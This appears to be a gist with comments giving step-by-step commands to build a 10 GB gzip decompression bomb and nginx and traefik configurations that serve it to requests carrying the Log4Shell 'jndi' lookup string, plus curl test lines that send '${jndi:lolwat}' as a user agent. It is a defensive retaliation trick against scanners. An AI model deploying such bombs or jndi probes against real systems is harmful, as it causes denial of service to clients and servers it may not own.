jndi-response.md

1. Generate the file:

$ awk 'BEGIN { for(c=0;c<10000000;c++) printf "<p>LOL</p>" }' > 100M.html
$ (for I in `seq 1 100`; do cat 100M.html; done) | pv | gzip -9 > 10G.boomgz

2. Check it is indeed good:

$ zcat 10G.boomgz | pv | wc
...
      0       1 10000000000

3. Put the field in the wwwroot

4. Hook it up to nginx

server {
  ...
  
  # Hi there, looking for some trouble?
  if ($http_user_agent ~* jndi) {
    rewrite ^(.*)$ /10G.boomgz;
  }
  if ($http_referer ~* jndi) {
    rewrite ^(.*)$ /10G.boomgz;
  }
  if ($request ~* jndi) {
    rewrite ^(.*)$ /10G.boomgz;
  }

  location ~* \.boomgz$ {
    add_header Expires "Sat, 1 Jan 2000 00:00:00 GMT"; # No caching.
    add_header Content-Encoding gzip;                  # Yup, that's a GZIP bomb. I mean, GZIP *stream*, take it.
    add_header Content-Type text/html;                 # Have a nice browser? Let it render stuff.
    limit_rate 100k;                                   # But wait, wait! The good part is coming any minute now.
  }
}  

5. Test it works

# Estimate: on-the-wire transfer
$ curl -s -L hostname -A "\${jndi:lolwat}" | pv > /dev/null

# Estimate: unpacked contents seen from client
$ curl -s --compressed -L hostname -A "\${jndi:lolwat}" | pv > /dev/null

for I in `seq 1 100`; do cat 100M.html; done; | pv | gzip -9 > 10G.new.boomgz

syntax error near unexpected token `|'

bash 5.0

for I in `seq 1 100`; do cat 100M.html; done; | pv | gzip -9 > 10G.new.boomgz

Needed parentheses.

For "testing": curl -s --compressed -L example.org -A "\${jndi:lolwat}" | pv > /dev/null

(Taken from @shipilev's Twitter post.)

Here's my traefik-attached docker-compose container:

user@host:~/docker/log4jbomb $ cat docker-compose.yml 
version: '3.2'

services:
  log4jbomb:
    restart: always
    image: nginx:mainline
    volumes:
      - ./htdocs:/usr/share/nginx/html
      - ./templates:/etc/nginx/templates
    container_name: log4jbomb
    networks:
      - proxy
    environment:
      - NGINX_HOST=host1.dev host2.invalid
      - NGINX_PORT=80
    labels:
      - "traefik.enable=true"
      - "traefik.http.routers.log4jbomb.entrypoints=web"
      - "traefik.http.routers.log4jbomb.rule=HeadersRegexp(`user-agent`, `.*jndi:.*`)"
      - "traefik.http.routers.log4jbomb.priority=1000"
      - "traefik.http.routers.log4jbomb-secure.entrypoints=web-secure"
      - "traefik.http.routers.log4jbomb-secure.rule=HeadersRegexp(`user-agent`, `.*jndi:.*`)||Host(`log4jbomb.myhost.invalid`)"
      - "traefik.http.routers.log4jbomb-secure.tls.certresolver=le"
      - "traefik.http.routers.log4jbomb-secure.tls=true"
      - "traefik.http.routers.log4jbomb-secure.service=log4jbomb"
      - "traefik.http.services.log4jbomb.loadbalancer.server.port=80"
      - "traefik.docker.network=proxy"


networks:
  proxy:
    external: true

The server tempalte only needs a

server {
  listen       ${NGINX_PORT};
  server_name  ${NGINX_HOST};
  access_log   /dev/stdout;

  root         /usr/share/nginx/html;

And the htdocs should be self-explanatory.

You can drop pv from the command if you don't have it installed, it just adds a progress bar.

awk 'BEGIN { for(c=0;c<10000000;c++) printf "<p>LOL</p>" }' >100M.html
for _ in {1..100}; do cat 100M.html; done | gzip -9 >10G.boomgz